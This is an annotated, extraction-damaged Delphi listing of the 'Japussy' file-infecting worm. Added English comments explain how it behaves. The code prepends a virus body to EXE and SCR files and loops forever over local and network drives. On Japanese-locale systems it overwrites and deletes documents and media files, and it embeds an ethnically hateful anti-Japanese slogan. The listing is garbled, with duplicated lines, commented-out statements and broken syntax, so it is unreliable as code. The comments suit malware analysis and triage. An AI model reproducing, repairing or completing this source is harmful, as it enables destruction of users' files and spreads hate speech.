可以用 C++ 打開哦。熊貓燒香。（註：以下清單本身是 Delphi（Object Pascal）原始碼，程式名為 Japussy，文中註解提到以 Delphi5 SP1 編譯；此處擷取的文字已有缺損，無法直接編譯。）
///program Japussy;//uses
//Windows, SysUtils, Classes, Graphics, ShellAPI,
//Registry);
//Constants, resource directive, imported function and globals for the sample.
//NOTE(review): most declarations here are prefixed with `//` in this copy of the
//listing, so they read as comments and the unit does not compile as shown.
const
//HeaderSize = 82432;//size of the virus body
//lconOffset = $12EB8;//offset of the PE file's main icon
//sizes obtained when compiled with the author's Delphi5 SP1; other Delphi versions may differ
//searching for the hex string 2800000020 locates the main icon offset
//HeaderSize =38912;//size of the virus body after UPX packing
//lconOffset =$92BC;//main icon offset of the UPX-packed PE file
//Upx 1.24W usage: upx -9--8086 Japussy.exe
//lconSize = $2E8;//size of the PE file's main icon -- 744 bytes
//lconSize = $2E8;//size of the PE file's main icon -- 744 bytes
//lconTail =lconOffset +lconSize; //end of the PE file's main icon
//Triage note: InfectOneFile reads the last four bytes of a file and compares them
//with this value, and appends $44444444 after rewriting a file, so the trailing
//dword marks files this sample has already processed.
//ID =$44444444;//infection marker
//junk text, kept ready for writing (SmashFile writes Catchword into files)
//Catchword = 'If a race need to be killed out, it mustbe Yamato.'+
//lf a country need to be destroyed, it must be
//Japan!'+
***W32//.Japussy.Worm.A ***!
[//$R*RES)
//function RegisterServiceProcess(dwProcessID
//dwType//: Integer):Integer;
//stdcall;externalKernel32.dll';//function declaration
//var
//TmpFile//: string;
//SI//: STARTUPINFO:
//Pi//: PROCESS INFORMATION:
//lsJap//: Boolean = False;//flag for a Japanese-language OS
//[Determine whether the OS is Win9x}
//Returns True when the platform id equals the constant the author labels Win9x,
//otherwise False.
//NOTE(review): the function header and `var` are commented out in this copy, and the
//dwOSVersionInfoSize assignment is cut off, so the step that fills Ver is not visible here.
//function IsWin9x: Boolean;
//var
Ver//: TOSVersionlnfo;
begin
Result := False;
Ver.dwOSVersionInfoSize :=
if (Ver.dwPlatformlD =
VER_PLATFORM _WIN32WINDOWS)then //Win9x
Result := True;
end;
//[Copy between streams》procedure CopyStream(Src: TStream; sStartPos:Integer; Dst: TStream;
dStartPos:Integer; Count: Integer);
//Copies Count bytes from Src into Dst starting at dStartPos, then restores both
//stream positions to the values they had on entry.
//NOTE(review): in this copy the procedure header and the Src.Seek(sStartPos) call
//are commented out, so as written the copy starts at Src's current position.
var
sCurPos, dCurPos: Integer;
begin
//remember where both streams were so the caller's positions are preserved
sCurPos := Src.Position;
dCurPos := Dst.Position
//Src.Seek(sStartPos,0);
Dst.Seek(dStartPos,0):
Dst.CopyFrom(Src, Count);
Src.Seek(sCurPos,0);
Dst.Seek(dCurPos,0);
end;
//[Separate the host file from the infected PE file so that it can be
//used)
//Reads the running executable (ParamStr(0)), skips the first HeaderSize bytes and
//writes the remainder to FileName.
//Remediation note: this shows the original program bytes are still present in an
//infected file after the HeaderSize prefix; the copied tail also includes whatever
//follows the host (InfectOneFile appends a 4-byte marker).
//NOTE(review): the empty `except` discards every error, so a failed extraction is silent.
//The listing repeats the `fmCreate); try` lines below; that looks like extraction damage.
procedure ExtractFile(FileName: string);
var
sStream,dStream: TFileStream;
begin
try
sStream := TFileStream.Create(ParamStr(0)
fmOpenRead or fmShareDenyNone)
try
dStream := TFileStream.Create(FileName
fmCreate);
try
fmCreate);
try
sStream.Seek(HeaderSize0);//skip the virus portion
//at the head of the file
dStream.CopyFrom(sStream,sStream.Size
HeaderSize);
finally
dStream.Free;
end;
finally
sStream.Free;
end;
except
end;
end;
//[Fill the STARTUPINFO structure》
//Initialises Si for a later CreateProcess call: sets cb to the structure size, clears
//the reserved/desktop/title pointers, and requests the window show state given in State.
procedure FillStartuplnfo(var Si: STARTUPINFO:
State: Word);
begin
Si.cb := SizeOf(Si);
Si.lpReserved := nil;
Si.lpDesktop := nil;
Si.lpTitle := nil;
//STARTF_USESHOWWINDOW makes wShowWindow below take effect
Si.dwFlags := STARTF_USESHOWWINDOW;
Si.wShowWindow := State;
Si.cbReserved2 := 0;
Si.lpReserved2 := nil;
end;
//[Send infected mail)
//Empty stub: the body contains no statements, so this listing has no mail-sending
//behaviour. It is still called from InfectFiles.
procedure SendMail:
begin
//left unimplemented by the author
//left unimplemented by the author
end;
//[Infect a PE file》
//Rewrites FileName in place. As this listing reads, the output is assembled in
//DstStream as: the running executable's first HeaderSize bytes (with the icon region
//at IconOffset replaced by the target's own icon), then the original file, then the
//4-byte marker $44444444.
//Triage notes grounded in the checks below:
//  - a file whose last four bytes equal the marker is treated as already processed;
//  - files smaller than 10240 bytes are skipped;
//  - the "PE" test only looks for the byte pair #80 #69 at offsets 0..$108.
//NOTE(review): this copy is extraction-damaged (duplicated lines, `trv`, statements
//hidden behind `//`, an unconditional Exit after the commented-out self check), so it
//does not compile or run as shown. The empty `except` swallows all errors.
procedure InfectOneFile(FileName: string);
var
HdrStream, SrcStream: TFileStream;coStream,DstStream: TMemoryStream;ilD: LongInt;
alcon: TIcon;
Infected, IsPE: Boolean;
i: Integer;
Buf: array[//0..1] of Char;
begin
try//on error the file is in use; exit
//if CompareText(FileName,JAPUSSY.EXE)=0then//skip if it is itself
Exit;
Infected := False;
IsPE := False;
SrcStream := TFileStream.Create(FileNamefmOpenRead);
try
fori:= //0to $108 do//check the PE file header
begin
SrcStream.Seek(i, soFromBeginning);
SrcStream.Read(Buf,2);
if (Buf[o]= //#80) and (Buf[1]= #69)then //PE signature
begin
if (Buf[o]= //#80) and (Buf[1]= #69) then //PE signature
begin
IsPE := True;//it is a PE file
Break;
end;
end;SrcStream.Seek(-4,soFromEnd);//check the infection marker
//SrcStream.Read(ilD,4);if (ilD =ID) or (SrcStream.Size <10240) then //files that are too small are not infected
lnfected := True;
finally
SrcStream.Free;
end;
ifInfected or(notlsPE) then //exit if already infected or not
//a PE file
Exit;
lcoStream := TMemoryStream.CreateDstStream := TMemoryStream.Create:
try
alcon := TIcon.Create;
trv
//get the target file's main icon (744 bytes) and store it in a stream
alcon.ReleaseHandle;
alcon.Handle := Extractlcon(HInstance
//PChar(FileName),0);
alcon.SaveToStream(lcoStream);
alcon.SaveToStream(lcoStream);
finally
alcon.Free;
end;
SrcStream := TFileStream.Create(FileNamefmOpenRead);
//header source: the running executable itself (ParamStr(0))
HdrStream := TFileStream.Create(ParamStr(0)fmOpenRead or fmShareDenyNone);
trv
//write the virus-body data that precedes its main icon
CopyStream(HdrStream, 0, DstStream, //0IconOffset);
//write the target program's main icon
CopyStream(lcoStream, 22, DstStream, IconOffset,lconSize);
//write the virus-body data between its main icon and the end of the virus body
CopyStream(HdrStream,IconTail,DstStreamIconTail,HeaderSize -IconTail);//write the host program
CopyStream(SrcStream,0. DstStream, HeaderSizeSrcStream.Size);
//write the infected marker
DstStream.Seek(0, 2);
ilD := $44444444;
DstStream.Write(ilD, 4);
finally
DstStream.Write(ilD, 4):finally
HdrStream.Free;
end;
finally
SrcStream.Free;
lcoStream.Free;
DstStream.SaveToFile(FileName);//replace the host file
DstStream.Free;
end;
except;
end;
end;
//[Overwrite the target file with junk text, then delete it}
//Destructive routine: clears the file's attributes, writes the Catchword text at
//Max evenly spaced offsets (Max is Random(15) raised to at least 5), then deletes the file.
//Recovery note: because content is overwritten before deletion, an undeleted copy
//would presumably be damaged at those offsets; restoring from backup is the safe path.
//NOTE(review): `Inc();` has lost its argument in this copy, and the empty `except`
//discards all errors.
procedure SmashFile(FileName: string);
var
FileHandle: Integer;
i,Size, Mass, Max, Len: Integer;
begin
try
SetFileAttributes(PChar(FileName),0);//clear the read-only
//attribute
FileHandle := FileOpen(FileName fmOpenWrite); //open the file
try
Size := GetFileSize(FileHandle,nil);//file size
i:= 0;
Randomize;
Max := Random(15);//random number of junk writes
if Max < 5 then
Max := 5;
Mass := Size div Max;//size of each interval block
Len := Length(Catchword);
whilei< Max do
begin
FileSeek(FileHandle,i* Mass,0);//seek to the block start
//write the junk text, destroying the file's contents
FileWrite(FileHandle, Catchword, Len);Inc();
end;
finally
FileClose(FileHandle);//close the file
end;
DeleteFile(PChar(FileName)); //delete it
except
end;
end;
//[Get the list of writable drives}
//Returns a string of drive letters whose type is DRIVE_FIXED or DRIVE_REMOTE.
//Scope note: DRIVE_REMOTE is accepted, so mapped network drives are within reach of
//the directory walk that consumes this list, not just local disks.
//NOTE(review): the assignment to Str is commented out/truncated in this copy, and
//Result is appended to without a visible initialisation.
function GetDrives: string;
var
DiskType: Word;
D: Char;
Str: string;
i: Integer;
begin
begin
fori:= //0to 25 do//iterate over the 26 letters
begin
D := Chr(i +65);
//Str := D+'
DiskType := GetDriveType(PChar(Str));//select local disks and network drives
if (DiskType = DRIVE_FIXED) or (DiskType =DRIVE_REMOTE) then
Result := Result + D;
end;
end;
//[Walk a directory, infecting and destroying files}
//Enumerates Path + Mask, dispatches each non-directory entry by upper-cased extension,
//then collects subdirectories and recurses into them.
//What the visible branches do:
//  - EXE / SCR: passed to InfectOneFile;
//  - HTM/HTML/ASP, WAB, ADC, IND: empty branches, nothing happens in this listing;
//  - otherwise, only when lsJap is set: a list of document/media/archive extensions
//    is passed to SmashFile.
//Behavioural indicators: a 200 ms sleep after every entry and a message-queue drain
//per entry, i.e. a slow, steady walk over every directory of each drive.
//NOTE(review): several conditions and the recursive call are commented out or
//garbled in this copy (quotes lost, `Count` declaration hidden), so it does not compile as shown.
procedure LoopFiles(Path, Mask: string);var
//,Count: Integer:
Fn, Ext: string;
SubDir: TStrings;
SearchRec: TSearchRec;
Msg: TMsg;
//Classifies a search record: 0 = not a directory, 1 = a directory other than the
//"." / ".." entries, 2 = anything else (the author labels this "root directory").
function IsValidDir(SearchRec: TSearchRec):
Integer;
begin
if (SearchRec.Attr <> 16) and (SearchRec.Name <>
)and
//(SearchRec.Name <>'..!) then
Result := 0//not a directory
else if (SearchRec.Attr = 16) and (SearchRec.Name
<>!)and
(SearchRec.Name <> !..) then
//(SearchRec.Name <>'.) thenResult := 1/not a root directory
else Result := 2;//is a root directory
end;
begin
if (FindFirst(Path + Mask, faAnyFile, SearchRec)=
0) then
begin
repeat
PeekMessage(Msg,0,0,0,PM_REMOVE);//drain the message queue (author's stated aim: avoid arousing suspicion)
if lsValidDir(SearchRec)= 0 then
begin
Fn := Path + SearchRec.Name;
Ext := UpperCase(ExtractFileExt(Fn));
if (Ext = 'EXE') or (Ext = 'SCR') thenbegin
InfectOneFile(Fn);//infect the executable file
end
//else if (Ext = 'HTM') or (Ext = !HTML) or (Ext =.ASP') then
begin
//author's note: HTML and ASP files, with a Base64-encoded copy written into them
//so that users browsing the page are affected
//not implemented in this listing; the branch is empty
end
else if Ext ='WAB' then //Outlook address book file
//else if Ext =!WAB' then //Outlook address book file
begin
//collect Outlook mail addresses (empty branch)
end
//else if Ext =!ADC' then //Foxmail address auto-complete file
begin
//collect Foxmail mail addresses (empty branch)
end
else if Ext ='IND' then //Foxmail address book file
begin
//collect Foxmail mail addresses (empty branch)
end
else
begin
iflsJap then //Japanese-language OS
begin
//if (Ext ='.DOC') or (Ext = !XLS') or (Ext = 'MDB') or
(Ext ='MP3') or (Ext = RM') or (Ext =RA') or
(Ext ='.WMA') or (Ext = ZIP') or (Ext = RAR') or
(Ext ='.MPEG') or (Ext = ASF) or (Ext =JPG')or(Ext ='.JPEG') or (Ext = GIF) or (Ext = SWF') or(Ext ='.PDF') or (Ext =!.CHM) or (Ext ='AVI') thenSmashFile(Fn);//destroy the file
end;
end;
end;
//sleep 200 ms after each file (author's stated aim: keep CPU usage from drawing attention)
Sleep(200);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
//second pass: gather subdirectory names, then recurse into each
SubDir := TStringList.Create;
//if (FindFirst(Path +'**1, faDirectory, SearchRec) = 0)
then
begin
repeat
if lsValidDir(SearchRec) = 1 then
SubDir.Add(SearchRec.Name);
until (FindNext(SearchRec) <> 0);
end;
FindClose(SearchRec);
Count := SubDir.Count - 1;
fori := 0 to Count do
//LoopFiles(Path + SubDir.Strings[i] +"Mask);FreeAndNil(SubDir);
end;
//[Walk all files on the disks]
//Top-level driver: sets lsJap when the ANSI code page is 932, obtains the drive list
//from GetDrives, then loops forever walking every listed drive with LoopFiles and
//calling SendMail (an empty stub in this listing).
//Containment note: the loop never terminates, so the process keeps re-walking drives
//until it is stopped; the 5-minute pause between passes is commented out in this copy.
//NOTE(review): several statements on the lines below sit behind `//` because the
//listing was collapsed, so they read as comments here.
procedure InfectFiles;
var
DriverList: string;
i, Len: Integer;
begin
if GetACP =932 then //Japanese-language OS lsJap := True;//author's hostile remark
DriverList := GetDrives;//get the list of writable disks Len := Length(DriverList);while True do//endless loop
begin
fori:= Len downto //1do //walk each disk drive LoopFiles(DriverList[i] +':**);//infect it SendMail;/l send infected mail
//
//Sleep(1000*60*5);/sleep 5 minutes
end;
end;
//(main program starts//
//Entry point. On Win9x it calls RegisterServiceProcess for the current process; the
//WinNT branch is empty. It then branches on the running file's name:
//  - named Japussy.exe: calls InfectFiles directly;
//  - otherwise (running from a modified host): derives TmpFile from its own path,
//    extracts the original program there with ExtractFile, launches it with
//    CreateProcess, then calls InfectFiles.
//Triage note: as the listing reads, TmpFile is built from the running executable's
//path with a space (#32) and `.exe` appended, so an extra executable whose name has a
//space before the extension, next to a modified program, is an artifact of this path.
//NOTE(review): the Delete/offset arithmetic and the CreateProcess arguments are
//garbled in this copy; confirm the exact file name against a clean sample analysis.
}
begin
iflsWin9x then //is Win9x RegisterServiceProcess(GetCurrentProcessID, 1)/register as a service process
else //WinNT
begin
//author's note: remote thread into the Explorer process
//not implemented in this listing; the branch is empty
end;
//if this is the original virus body itself
if CompareText(ExtractFileName(ParamStr(0))
//Japussy.exe') = 0 then
InfectFiles//infect and send mail
else//already attached to a host program; start working
begin
//TmpFile := ParamStr(0);/create the temporary file
Delete(TmpFile, Length(TmpFile) - 4, 4);TmpFile := TmpFile + ///#32+.exe';//the real host file, with one extra space
ExtractFile(TmpFile);//separate it
///FillStartupInfo(Si,SW_SHOWDEFAULT);CreateProcess(PChar(TmpFile),PChar(TmpFile), nil,nil,True.
//0,nil,',Si,Pi);//create a new process to run it
InfectFiles;//infect and send mail
end;
end.